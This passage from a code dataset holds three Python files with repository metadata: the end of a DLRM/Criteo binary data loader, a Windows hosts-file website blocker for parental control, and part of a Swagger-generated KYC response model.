self.num_batches = math.ceil(os.path.getsize(data_file) / bytes_per_batch)
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
self.mmap = np.memmap(data_file, dtype=np.int32, mode='r')
def __len__(self):
return self.num_batches
def __getitem__(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
start_idx = idx * (self.batch_size * self.record_width)
end_idx = min((idx + 1) * (self.batch_size * self.record_width), self.mmap.shape[0])
array = self.mmap[start_idx:end_idx]
tensor = torch.from_numpy(array).reshape(-1, self.record_width)
return tensor
class DistCriteoDataset(Dataset):
"""Distributed version of Criteo dataset
Args:
data_path (str): Full path to split binary file of dataset. It must contain numerical.bin, label.bin and
cat_0 ~ cat_25.bin
batch_size (int):
shuffle (boolean):
numerical_features(boolean): If True, load numerical features for bottom_mlp. Default False
categorical_features (list or None): categorical features used by the rank
prefetch_depth (int): How many samples to prefetch. Default 10.
"""
def __init__(self, data_path, batch_size=1, shuffle=False, numerical_features=False, categorical_features=None,
prefetch_depth=10):
bytes_per_label = 4
self.bytes_per_batch = {
"label": bytes_per_label * batch_size,
"numerical": 13 * 4 * batch_size if numerical_features else 0,
"categorical": 4 * batch_size if categorical_features is not None else 0
}
self.batch_size = batch_size
self.label_file = os.open(os.path.join(data_path, F"label.bin"), os.O_RDONLY)
label_file_size = os.fstat(self.label_file).st_size
self.num_samples = int(label_file_size / bytes_per_label)
self.num_batches = math.ceil(label_file_size / self.bytes_per_batch["label"])
if numerical_features:
self.numerical_features_file = os.open(os.path.join(data_path, "numerical.bin"), os.O_RDONLY)
if math.ceil(os.fstat(self.numerical_features_file).st_size /
self.bytes_per_batch["numerical"]) != self.num_batches:
raise ValueError("Size miss match in data files")
else:
self.numerical_features_file = None
if categorical_features is not None and categorical_features:
self.categorical_features_files = []
for cat_id in categorical_features:
cat_file = os.open(os.path.join(data_path, F"cat_{cat_id}.bin"), os.O_RDONLY)
if math.ceil(
os.fstat(cat_file).st_size / self.bytes_per_batch["categorical"]) != self.num_batches:
raise ValueError("Size miss match in data files")
self.categorical_features_files.append(cat_file)
else:
self.categorical_features_files = None
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
self.prefetch_depth = min(prefetch_depth, self.num_batches)
self.prefetch_queue = queue.Queue()
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=1)
def __len__(self):
return self.num_batches
def getitem(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
raw_label_data = os.pread(
self.label_file, self.bytes_per_batch["label"], idx * self.bytes_per_batch["label"])
click = torch.from_numpy(np.frombuffer(raw_label_data, dtype=np.float32))
if self.numerical_features_file is not None:
raw_numerical_data = os.pread(
self.numerical_features_file,
self.bytes_per_batch["numerical"],
idx * self.bytes_per_batch["numerical"])
numerical_features = torch.from_numpy(np.frombuffer(raw_numerical_data,
dtype=np.float32)).view(-1, 13)
else:
numerical_features = None
if self.categorical_features_files is not None:
categorical_features = []
for cat_file in self.categorical_features_files:
raw_cat_data = os.pread(
cat_file,
self.bytes_per_batch["categorical"],
idx * self.bytes_per_batch["categorical"])
categorical_features.append(torch.from_numpy(np.frombuffer(raw_cat_data, dtype=np.int32)).unsqueeze(1))
categorical_features = torch.cat(categorical_features, dim=1)
else:
categorical_features = None
return click, numerical_features, categorical_features
def __getitem__(self, idx):
if self.prefetch_depth <= 1:
return self.getitem(idx)
if idx == 0:
# Prefetch triggers MLperf timer. So start prefetch on first iter instead of in constructor.
for i in range(self.prefetch_depth):
self.prefetch_queue.put(self.executor.submit(self.getitem, (i)))
if idx < self.num_batches - self.prefetch_depth:
self.prefetch_queue.put(self.executor.submit(self.getitem, (idx + self.prefetch_depth)))
return self.prefetch_queue.get().result()
def __del__(self):
os.close(self.label_file)
if self.numerical_features_file is not None:
os.close(self.numerical_features_file)
if self.categorical_features_files is not None:
for cat_file in self.categorical_features_files:
os.close(cat_file)
def data_collate_fn(batch_data, device="cuda", orig_stream=None):
"""Split raw batch data to features and labels
Args:
batch_data (Tensor): One batch of data from CriteoBinDataset.
device (torch.device): Output device. If device is GPU, split data on GPU is much faster.
orig_stream (torch.cuda.Stream): CUDA stream that data processing will be run in.
Returns:
numerical_features (Tensor):
categorical_features (Tensor):
click (Tensor):
"""
if not isinstance(batch_data, torch.Tensor):
# Distributed pass
if batch_data[1] is not None:
numerical_features = torch.log(batch_data[1].to(device, non_blocking=True) + 1.).squeeze()
else:
# There is code that relies on numerical_features' dtype
numerical_features = torch.empty(batch_data[0].shape[0], 13, dtype=torch.float32, device=device)
if batch_data[2] is not None:
categorical_features = batch_data[2].to(device, non_blocking=True)
else:
categorical_features = None
click = batch_data[0].to(device, non_blocking=True).squeeze()
else:
batch_data = batch_data.to(device, non_blocking=True).split([1, 13, 26], dim=1)
numerical_features = torch.log(batch_data[1].to(torch.float32) + 1.).squeeze()
categorical_features = batch_data[2].to(torch.long)
click = batch_data[0].to(torch.float32).squeeze()
# record_stream() prevents data being unintentionally reused. Also NOTE that it may not work
# with num_workers >= 1 in the DataLoader when using this data_collate_fn() as the collate function.
if orig_stream is not None:
numerical_features.record_stream(orig_stream)
if categorical_features is not None:
categorical_features.record_stream(orig_stream)
click.record_stream(orig_stream)
return numerical_features, categorical_features, click
def prefetcher(load_iterator, prefetch_stream):
def _prefetch():
with torch.cuda.stream(prefetch_stream):
try:
data_batch = next(load_iterator)
except StopIteration:
return None
return data_batch
next_data_batch = _prefetch()
while next_data_batch is not None:
torch.cuda.current_stream().wait_stream(prefetch_stream)
data_batch = next_data_batch
next_data_batch = _prefetch()
yield data_batch
avg_line_length: 40.326761 | max_line_length: 119 | alphanum_fraction: 0.656538
content_no_comment:
import concurrent
import functools
import math
import os
import queue
import numpy as np
from dlrm import mlperf_logger
import torch
from torch.utils.data import Dataset
from dlrm.utils import distributed as dist
def get_data_loader(dataset_path,
batch_size,
test_batch_size,
return_device="cuda",
dataset_type="bin",
num_workers=0,
shuffle=False,
**kwargs):
train_dataset_bin = os.path.join(dataset_path, "train_data.bin")
test_dataset_bin = os.path.join(dataset_path, "test_data.bin")
if dataset_type == 'bin':
dataset_train = CriteoBinDataset(train_dataset_bin, batch_size=batch_size, shuffle=shuffle)
dataset_test = CriteoBinDataset(test_dataset_bin, batch_size=test_batch_size)
elif dataset_type == 'memmap':
dataset_train = CriteoMemmapDataset(train_dataset_bin, batch_size=batch_size, shuffle=shuffle)
dataset_test = CriteoMemmapDataset(test_dataset_bin, batch_size=test_batch_size)
elif dataset_type == 'dist':
dataset_train = DistCriteoDataset(
os.path.join(dataset_path, "train"), batch_size=batch_size, shuffle=shuffle, **kwargs)
if hasattr(dataset_train, 'num_samples'):
mlperf_logger.log_event(key=mlperf_logger.constants.TRAIN_SAMPLES,
value=dataset_train.num_samples)
dataset_test = DistCriteoDataset(
os.path.join(dataset_path, "test"), batch_size=test_batch_size, **kwargs)
if hasattr(dataset_test, 'num_samples'):
mlperf_logger.log_event(key=mlperf_logger.constants.EVAL_SAMPLES,
value=dataset_test.num_samples)
data_loader_args = dict(
batch_size=None,
num_workers=num_workers,
pin_memory=False,
collate_fn=functools.partial(data_collate_fn, device=return_device, orig_stream=torch.cuda.current_stream()))
data_loader_train = torch.utils.data.DataLoader(dataset_train, **data_loader_args)
data_loader_test = torch.utils.data.DataLoader(dataset_test, **data_loader_args)
return data_loader_train, data_loader_test
def _dist_permutation(size):
if dist.get_world_size() > 1:
permutation_file = "/tmp/permutation.npy"
if dist.get_local_rank() == 0:
np.save(permutation_file, np.random.permutation(size))
torch.distributed.barrier()
permutation = np.load(permutation_file)
else:
permutation = np.random.permutation(size)
return permutation
class CriteoBinDataset(Dataset):
def __init__(self, data_file, batch_size=1, bytes_per_feature=4, shuffle=False):
self.tad_fea = 1 + 13
self.tot_fea = 1 + 13 + 26
self.batch_size = batch_size
self.bytes_per_batch = (bytes_per_feature * self.tot_fea * batch_size)
self.num_batches = math.ceil(os.path.getsize(data_file) / self.bytes_per_batch)
print('data file:', data_file, 'number of batches:', self.num_batches)
self.file = open(data_file, 'rb', buffering=0)
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
def __len__(self):
return self.num_batches
def __getitem__(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
self.file.seek(idx * self.bytes_per_batch, 0)
raw_data = self.file.read(self.bytes_per_batch)
array = np.frombuffer(raw_data, dtype=np.int32)
tensor = torch.from_numpy(array).view((-1, self.tot_fea))
return tensor
def __del__(self):
self.file.close()
class CriteoMemmapDataset(Dataset):
def __init__(self, data_file, batch_size, bytes_per_feature=4, shuffle=False):
self.record_width = 40
self.batch_size = batch_size
bytes_per_batch = (bytes_per_feature * self.record_width * batch_size)
self.num_batches = math.ceil(os.path.getsize(data_file) / bytes_per_batch)
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
self.mmap = np.memmap(data_file, dtype=np.int32, mode='r')
def __len__(self):
return self.num_batches
def __getitem__(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
start_idx = idx * (self.batch_size * self.record_width)
end_idx = min((idx + 1) * (self.batch_size * self.record_width), self.mmap.shape[0])
array = self.mmap[start_idx:end_idx]
tensor = torch.from_numpy(array).reshape(-1, self.record_width)
return tensor
class DistCriteoDataset(Dataset):
def __init__(self, data_path, batch_size=1, shuffle=False, numerical_features=False, categorical_features=None,
prefetch_depth=10):
bytes_per_label = 4
self.bytes_per_batch = {
"label": bytes_per_label * batch_size,
"numerical": 13 * 4 * batch_size if numerical_features else 0,
"categorical": 4 * batch_size if categorical_features is not None else 0
}
self.batch_size = batch_size
self.label_file = os.open(os.path.join(data_path, F"label.bin"), os.O_RDONLY)
label_file_size = os.fstat(self.label_file).st_size
self.num_samples = int(label_file_size / bytes_per_label)
self.num_batches = math.ceil(label_file_size / self.bytes_per_batch["label"])
if numerical_features:
self.numerical_features_file = os.open(os.path.join(data_path, "numerical.bin"), os.O_RDONLY)
if math.ceil(os.fstat(self.numerical_features_file).st_size /
self.bytes_per_batch["numerical"]) != self.num_batches:
raise ValueError("Size miss match in data files")
else:
self.numerical_features_file = None
if categorical_features is not None and categorical_features:
self.categorical_features_files = []
for cat_id in categorical_features:
cat_file = os.open(os.path.join(data_path, F"cat_{cat_id}.bin"), os.O_RDONLY)
if math.ceil(
os.fstat(cat_file).st_size / self.bytes_per_batch["categorical"]) != self.num_batches:
raise ValueError("Size miss match in data files")
self.categorical_features_files.append(cat_file)
else:
self.categorical_features_files = None
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
self.prefetch_depth = min(prefetch_depth, self.num_batches)
self.prefetch_queue = queue.Queue()
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=1)
def __len__(self):
return self.num_batches
def getitem(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
raw_label_data = os.pread(
self.label_file, self.bytes_per_batch["label"], idx * self.bytes_per_batch["label"])
click = torch.from_numpy(np.frombuffer(raw_label_data, dtype=np.float32))
if self.numerical_features_file is not None:
raw_numerical_data = os.pread(
self.numerical_features_file,
self.bytes_per_batch["numerical"],
idx * self.bytes_per_batch["numerical"])
numerical_features = torch.from_numpy(np.frombuffer(raw_numerical_data,
dtype=np.float32)).view(-1, 13)
else:
numerical_features = None
if self.categorical_features_files is not None:
categorical_features = []
for cat_file in self.categorical_features_files:
raw_cat_data = os.pread(
cat_file,
self.bytes_per_batch["categorical"],
idx * self.bytes_per_batch["categorical"])
categorical_features.append(torch.from_numpy(np.frombuffer(raw_cat_data, dtype=np.int32)).unsqueeze(1))
categorical_features = torch.cat(categorical_features, dim=1)
else:
categorical_features = None
return click, numerical_features, categorical_features
def __getitem__(self, idx):
if self.prefetch_depth <= 1:
return self.getitem(idx)
if idx == 0:
for i in range(self.prefetch_depth):
self.prefetch_queue.put(self.executor.submit(self.getitem, (i)))
if idx < self.num_batches - self.prefetch_depth:
self.prefetch_queue.put(self.executor.submit(self.getitem, (idx + self.prefetch_depth)))
return self.prefetch_queue.get().result()
def __del__(self):
os.close(self.label_file)
if self.numerical_features_file is not None:
os.close(self.numerical_features_file)
if self.categorical_features_files is not None:
for cat_file in self.categorical_features_files:
os.close(cat_file)
def data_collate_fn(batch_data, device="cuda", orig_stream=None):
if not isinstance(batch_data, torch.Tensor):
if batch_data[1] is not None:
numerical_features = torch.log(batch_data[1].to(device, non_blocking=True) + 1.).squeeze()
else:
numerical_features = torch.empty(batch_data[0].shape[0], 13, dtype=torch.float32, device=device)
if batch_data[2] is not None:
categorical_features = batch_data[2].to(device, non_blocking=True)
else:
categorical_features = None
click = batch_data[0].to(device, non_blocking=True).squeeze()
else:
batch_data = batch_data.to(device, non_blocking=True).split([1, 13, 26], dim=1)
numerical_features = torch.log(batch_data[1].to(torch.float32) + 1.).squeeze()
categorical_features = batch_data[2].to(torch.long)
click = batch_data[0].to(torch.float32).squeeze()
# record_stream() prevents data being unintentionally reused. Also NOTE that it may not work
# with num_workers >= 1 in the DataLoader when using this data_collate_fn() as the collate function.
if orig_stream is not None:
numerical_features.record_stream(orig_stream)
if categorical_features is not None:
categorical_features.record_stream(orig_stream)
click.record_stream(orig_stream)
return numerical_features, categorical_features, click
def prefetcher(load_iterator, prefetch_stream):
def _prefetch():
with torch.cuda.stream(prefetch_stream):
try:
data_batch = next(load_iterator)
except StopIteration:
return None
return data_batch
next_data_batch = _prefetch()
while next_data_batch is not None:
torch.cuda.current_stream().wait_stream(prefetch_stream)
data_batch = next_data_batch
next_data_batch = _prefetch()
yield data_batch
is_comment_constant_removed: true | is_sharp_comment_removed: true
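The record above assumes a fixed binary layout of 40 int32 values per sample (1 label, 13 dense features, 26 categorical features). The sketch below reproduces the [1, 13, 26] split performed by data_collate_fn on a synthetic batch; the random values are illustrative only.

# Hedged sketch of the per-sample layout and batch split used above (synthetic data).
import numpy as np
import torch

batch_size = 4
raw = np.random.randint(0, 100, size=(batch_size, 40), dtype=np.int32)
batch = torch.from_numpy(raw)

label, dense, sparse = batch.split([1, 13, 26], dim=1)
numerical_features = torch.log(dense.to(torch.float32) + 1.0)  # same log(x + 1) transform
categorical_features = sparse.to(torch.long)
click = label.to(torch.float32).squeeze()
print(numerical_features.shape, categorical_features.shape, click.shape)
# expected: torch.Size([4, 13]) torch.Size([4, 26]) torch.Size([4])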
hexsha: 1c420781d029b750bab07902b9e11705fcd9a9da | size: 1,654 | ext: py | lang: Python
max_stars: main.py @ iFly350x/Parental-Control-Website-Blockage- (head fdf30f35d8a7cea0634dd7a1f7b20b05877d249a) | licenses ["BSL-1.0"] | count null | events null
max_issues: main.py @ iFly350x/Parental-Control-Website-Blockage- (head fdf30f35d8a7cea0634dd7a1f7b20b05877d249a) | licenses ["BSL-1.0"] | count null | events null
max_forks: main.py @ iFly350x/Parental-Control-Website-Blockage- (head fdf30f35d8a7cea0634dd7a1f7b20b05877d249a) | licenses ["BSL-1.0"] | count null | events null
content:
import os
from pathlib import Path
import sys
from typing import *
import ipaddress
class sitesControl:
FILE_PATH = Path('C:\Windows\System32\drivers\etc')
def __init__(self) -> None:
self.path = self.FILE_PATH
self.websites = websites = []
self.size = None
self.ip = ipaddress.ip_address('127.0.0.1')
def checkos(self) -> None:
if not sys.platform.startswith('win'):
raise SystemExit("Only Windows Is Supported!")
def changePath(self) -> None:
os.chdir(self.path)
def changePerms(self) -> None:
os.chmod("hosts", 0o777)
def getinp(self) -> None:
while True:
try:
self.size = int(input('Enter Number Of Sites To block: '))
break
except:
print("invalid input please enter a number")
for _ in range(self.size):
website = input("Enter Wbsites: ").replace(" ", "").rstrip("/")
self.websites.append(website)
def addingList(self) -> None:
with open('hosts', 'a') as f:
for _ in range(self.size):
for i in self.websites:
f.write("\n{} {}".format(self.ip, i))
def verification(self) -> None:
for i in self.websites:
print("Wesbsite {} Has Been Blocked. Please Refresh Your Browser.".format(i))
def main() -> None:
control = sitesControl()
control.checkos()
control.changePath()
control.changePerms()
control.getinp()
control.addingList()
control.verification()
if __name__ == '__main__':
main()
avg_line_length: 25.84375 | max_line_length: 89 | alphanum_fraction: 0.561064
content_no_comment:
import os
from pathlib import Path
import sys
from typing import *
import ipaddress
class sitesControl:
FILE_PATH = Path('C:\Windows\System32\drivers\etc')
def __init__(self) -> None:
self.path = self.FILE_PATH
self.websites = websites = []
self.size = None
self.ip = ipaddress.ip_address('127.0.0.1')
def checkos(self) -> None:
if not sys.platform.startswith('win'):
raise SystemExit("Only Windows Is Supported!")
def changePath(self) -> None:
os.chdir(self.path)
def changePerms(self) -> None:
os.chmod("hosts", 0o777)
def getinp(self) -> None:
while True:
try:
self.size = int(input('Enter Number Of Sites To block: '))
break
except:
print("invalid input please enter a number")
for _ in range(self.size):
website = input("Enter Wbsites: ").replace(" ", "").rstrip("/")
self.websites.append(website)
def addingList(self) -> None:
with open('hosts', 'a') as f:
for _ in range(self.size):
for i in self.websites:
f.write("\n{} {}".format(self.ip, i))
def verification(self) -> None:
for i in self.websites:
print("Wesbsite {} Has Been Blocked. Please Refresh Your Browser.".format(i))
def main() -> None:
control = sitesControl()
control.checkos()
control.changePath()
control.changePerms()
control.getinp()
control.addingList()
control.verification()
if __name__ == '__main__':
main()
is_comment_constant_removed: true | is_sharp_comment_removed: true
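As a safe illustration of the hosts entries the record above appends, the sketch below writes the same "127.0.0.1 <site>" lines to a temporary file instead of the real Windows hosts file; the site names are made up.

# Hedged sketch: write the same hosts-file lines to a temp file instead of the system hosts.
import ipaddress
import tempfile

ip = ipaddress.ip_address("127.0.0.1")
websites = ["example.com", "www.example.org"]  # illustrative inputs

with tempfile.NamedTemporaryFile("w+", suffix="_hosts", delete=False) as f:
    for site in websites:
        f.write("\n{} {}".format(ip, site))    # same line format used by addingList
    f.seek(0)
    print(f.read())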
hexsha: 1c420894852746a91a8d8ed2518ead17557c43f2 | size: 11,264 | ext: py | lang: Python
max_stars: integration/python/integration_api/models/kyc_response_vo.py @ ShekharPaatni/SDK (head 6534ffdb63af87c02c431df9add05a90370183cb) | licenses ["Apache-2.0"] | count 11 | events 2019-04-16T02:11:17.000Z to 2021-12-16T22:51:40.000Z
max_issues: integration/python/integration_api/models/kyc_response_vo.py @ ShekharPaatni/SDK (head 6534ffdb63af87c02c431df9add05a90370183cb) | licenses ["Apache-2.0"] | count 81 | events 2019-11-19T23:24:28.000Z to 2022-03-28T11:35:47.000Z
max_forks: integration/python/integration_api/models/kyc_response_vo.py @ ShekharPaatni/SDK (head 6534ffdb63af87c02c431df9add05a90370183cb) | licenses ["Apache-2.0"] | count 11 | events 2020-07-08T02:29:56.000Z to 2022-03-28T10:05:33.000Z
content:
# coding: utf-8
"""
Hydrogen Integration API
The Hydrogen Integration API # noqa: E501
OpenAPI spec version: 1.3.1
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from integration_api.configuration import Configuration
class KycResponseVo(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'create_date': 'datetime',
'kyc_status': 'str',
'kyc_type': 'str',
'nucleus_business_id': 'str',
'nucleus_client_id': 'str',
'nucleus_document_id': 'str',
'product': 'str',
'update_date': 'datetime',
'vendor_name': 'str',
'vendor_request_data': 'KycVendorRequestDataVO',
'vendor_response': 'object'
}
attribute_map = {
'create_date': 'create_date',
'kyc_status': 'kyc_status',
'kyc_type': 'kyc_type',
'nucleus_business_id': 'nucleus_business_id',
'nucleus_client_id': 'nucleus_client_id',
'nucleus_document_id': 'nucleus_document_id',
'product': 'product',
'update_date': 'update_date',
'vendor_name': 'vendor_name',
'vendor_request_data': 'vendor_request_data',
'vendor_response': 'vendor_response'
}
def __init__(self, create_date=None, kyc_status=None, kyc_type=None, nucleus_business_id=None, nucleus_client_id=None, nucleus_document_id=None, product=None, update_date=None, vendor_name=None, vendor_request_data=None, vendor_response=None, _configuration=None): # noqa: E501
"""KycResponseVo - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._create_date = None
self._kyc_status = None
self._kyc_type = None
self._nucleus_business_id = None
self._nucleus_client_id = None
self._nucleus_document_id = None
self._product = None
self._update_date = None
self._vendor_name = None
self._vendor_request_data = None
self._vendor_response = None
self.discriminator = None
if create_date is not None:
self.create_date = create_date
if kyc_status is not None:
self.kyc_status = kyc_status
if kyc_type is not None:
self.kyc_type = kyc_type
if nucleus_business_id is not None:
self.nucleus_business_id = nucleus_business_id
if nucleus_client_id is not None:
self.nucleus_client_id = nucleus_client_id
if nucleus_document_id is not None:
self.nucleus_document_id = nucleus_document_id
if product is not None:
self.product = product
if update_date is not None:
self.update_date = update_date
if vendor_name is not None:
self.vendor_name = vendor_name
if vendor_request_data is not None:
self.vendor_request_data = vendor_request_data
if vendor_response is not None:
self.vendor_response = vendor_response
@property
def create_date(self):
"""Gets the create_date of this KycResponseVo. # noqa: E501
:return: The create_date of this KycResponseVo. # noqa: E501
:rtype: datetime
"""
return self._create_date
@create_date.setter
def create_date(self, create_date):
"""Sets the create_date of this KycResponseVo.
:param create_date: The create_date of this KycResponseVo. # noqa: E501
:type: datetime
"""
self._create_date = create_date
@property
def kyc_status(self):
"""Gets the kyc_status of this KycResponseVo. # noqa: E501
:return: The kyc_status of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._kyc_status
@kyc_status.setter
def kyc_status(self, kyc_status):
"""Sets the kyc_status of this KycResponseVo.
:param kyc_status: The kyc_status of this KycResponseVo. # noqa: E501
:type: str
"""
self._kyc_status = kyc_status
@property
def kyc_type(self):
"""Gets the kyc_type of this KycResponseVo. # noqa: E501
:return: The kyc_type of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._kyc_type
@kyc_type.setter
def kyc_type(self, kyc_type):
"""Sets the kyc_type of this KycResponseVo.
:param kyc_type: The kyc_type of this KycResponseVo. # noqa: E501
:type: str
"""
self._kyc_type = kyc_type
@property
def nucleus_business_id(self):
"""Gets the nucleus_business_id of this KycResponseVo. # noqa: E501
:return: The nucleus_business_id of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._nucleus_business_id
@nucleus_business_id.setter
def nucleus_business_id(self, nucleus_business_id):
"""Sets the nucleus_business_id of this KycResponseVo.
:param nucleus_business_id: The nucleus_business_id of this KycResponseVo. # noqa: E501
:type: str
"""
self._nucleus_business_id = nucleus_business_id
@property
def nucleus_client_id(self):
"""Gets the nucleus_client_id of this KycResponseVo. # noqa: E501
:return: The nucleus_client_id of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._nucleus_client_id
@nucleus_client_id.setter
def nucleus_client_id(self, nucleus_client_id):
"""Sets the nucleus_client_id of this KycResponseVo.
:param nucleus_client_id: The nucleus_client_id of this KycResponseVo. # noqa: E501
:type: str
"""
self._nucleus_client_id = nucleus_client_id
@property
def nucleus_document_id(self):
"""Gets the nucleus_document_id of this KycResponseVo. # noqa: E501
:return: The nucleus_document_id of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._nucleus_document_id
@nucleus_document_id.setter
def nucleus_document_id(self, nucleus_document_id):
"""Sets the nucleus_document_id of this KycResponseVo.
:param nucleus_document_id: The nucleus_document_id of this KycResponseVo. # noqa: E501
:type: str
"""
self._nucleus_document_id = nucleus_document_id
@property
def product(self):
"""Gets the product of this KycResponseVo. # noqa: E501
:return: The product of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._product
@product.setter
def product(self, product):
"""Sets the product of this KycResponseVo.
:param product: The product of this KycResponseVo. # noqa: E501
:type: str
"""
self._product = product
@property
def update_date(self):
"""Gets the update_date of this KycResponseVo. # noqa: E501
:return: The update_date of this KycResponseVo. # noqa: E501
:rtype: datetime
"""
return self._update_date
@update_date.setter
def update_date(self, update_date):
"""Sets the update_date of this KycResponseVo.
:param update_date: The update_date of this KycResponseVo. # noqa: E501
:type: datetime
"""
self._update_date = update_date
@property
def vendor_name(self):
"""Gets the vendor_name of this KycResponseVo. # noqa: E501
:return: The vendor_name of this KycResponseVo. # noqa: E501
:rtype: str
"""
return self._vendor_name
@vendor_name.setter
def vendor_name(self, vendor_name):
"""Sets the vendor_name of this KycResponseVo.
:param vendor_name: The vendor_name of this KycResponseVo. # noqa: E501
:type: str
"""
self._vendor_name = vendor_name
@property
def vendor_request_data(self):
"""Gets the vendor_request_data of this KycResponseVo. # noqa: E501
:return: The vendor_request_data of this KycResponseVo. # noqa: E501
:rtype: KycVendorRequestDataVO
"""
return self._vendor_request_data
@vendor_request_data.setter
def vendor_request_data(self, vendor_request_data):
"""Sets the vendor_request_data of this KycResponseVo.
:param vendor_request_data: The vendor_request_data of this KycResponseVo. # noqa: E501
:type: KycVendorRequestDataVO
"""
self._vendor_request_data = vendor_request_data
@property
def vendor_response(self):
"""Gets the vendor_response of this KycResponseVo. # noqa: E501
:return: The vendor_response of this KycResponseVo. # noqa: E501
:rtype: object
"""
return self._vendor_response
@vendor_response.setter
def vendor_response(self, vendor_response):
"""Sets the vendor_response of this KycResponseVo.
:param vendor_response: The vendor_response of this KycResponseVo. # noqa: E501
:type: object
"""
self._vendor_response = vendor_response
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(KycResponseVo, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, KycResponseVo):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, KycResponseVo):
return True
return self.to_dict() != other.to_dict()
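# --- Illustrative usage sketch (editor's addition, not part of the generated client) ---
# The model above is standard Swagger-codegen output: attributes are declared in
# swagger_types, set through simple property setters, and serialized recursively by
# to_dict(). A minimal, hypothetical usage might look like this; the field values are
# made-up placeholders, not real KYC data.
if __name__ == '__main__':
    example = KycResponseVo(kyc_status='PENDING', kyc_type='INDIVIDUAL',
                            product='ONBOARDING', vendor_name='acme-kyc')
    # to_dict() walks swagger_types and recursively serializes nested models,
    # lists and dicts; attributes that were never set come back as None.
    print(example.to_dict())
    # __repr__ delegates to to_str(), which pretty-prints the same dict.
    print(example)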
| 29.333333
| 282
| 0.621893
|
import pprint
import re
import six
from integration_api.configuration import Configuration
class KycResponseVo(object):
swagger_types = {
'create_date': 'datetime',
'kyc_status': 'str',
'kyc_type': 'str',
'nucleus_business_id': 'str',
'nucleus_client_id': 'str',
'nucleus_document_id': 'str',
'product': 'str',
'update_date': 'datetime',
'vendor_name': 'str',
'vendor_request_data': 'KycVendorRequestDataVO',
'vendor_response': 'object'
}
attribute_map = {
'create_date': 'create_date',
'kyc_status': 'kyc_status',
'kyc_type': 'kyc_type',
'nucleus_business_id': 'nucleus_business_id',
'nucleus_client_id': 'nucleus_client_id',
'nucleus_document_id': 'nucleus_document_id',
'product': 'product',
'update_date': 'update_date',
'vendor_name': 'vendor_name',
'vendor_request_data': 'vendor_request_data',
'vendor_response': 'vendor_response'
}
def __init__(self, create_date=None, kyc_status=None, kyc_type=None, nucleus_business_id=None, nucleus_client_id=None, nucleus_document_id=None, product=None, update_date=None, vendor_name=None, vendor_request_data=None, vendor_response=None, _configuration=None):
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._create_date = None
self._kyc_status = None
self._kyc_type = None
self._nucleus_business_id = None
self._nucleus_client_id = None
self._nucleus_document_id = None
self._product = None
self._update_date = None
self._vendor_name = None
self._vendor_request_data = None
self._vendor_response = None
self.discriminator = None
if create_date is not None:
self.create_date = create_date
if kyc_status is not None:
self.kyc_status = kyc_status
if kyc_type is not None:
self.kyc_type = kyc_type
if nucleus_business_id is not None:
self.nucleus_business_id = nucleus_business_id
if nucleus_client_id is not None:
self.nucleus_client_id = nucleus_client_id
if nucleus_document_id is not None:
self.nucleus_document_id = nucleus_document_id
if product is not None:
self.product = product
if update_date is not None:
self.update_date = update_date
if vendor_name is not None:
self.vendor_name = vendor_name
if vendor_request_data is not None:
self.vendor_request_data = vendor_request_data
if vendor_response is not None:
self.vendor_response = vendor_response
@property
def create_date(self):
return self._create_date
@create_date.setter
def create_date(self, create_date):
self._create_date = create_date
@property
def kyc_status(self):
return self._kyc_status
@kyc_status.setter
def kyc_status(self, kyc_status):
self._kyc_status = kyc_status
@property
def kyc_type(self):
return self._kyc_type
@kyc_type.setter
def kyc_type(self, kyc_type):
self._kyc_type = kyc_type
@property
def nucleus_business_id(self):
return self._nucleus_business_id
@nucleus_business_id.setter
def nucleus_business_id(self, nucleus_business_id):
self._nucleus_business_id = nucleus_business_id
@property
def nucleus_client_id(self):
return self._nucleus_client_id
@nucleus_client_id.setter
def nucleus_client_id(self, nucleus_client_id):
self._nucleus_client_id = nucleus_client_id
@property
def nucleus_document_id(self):
return self._nucleus_document_id
@nucleus_document_id.setter
def nucleus_document_id(self, nucleus_document_id):
self._nucleus_document_id = nucleus_document_id
@property
def product(self):
return self._product
@product.setter
def product(self, product):
self._product = product
@property
def update_date(self):
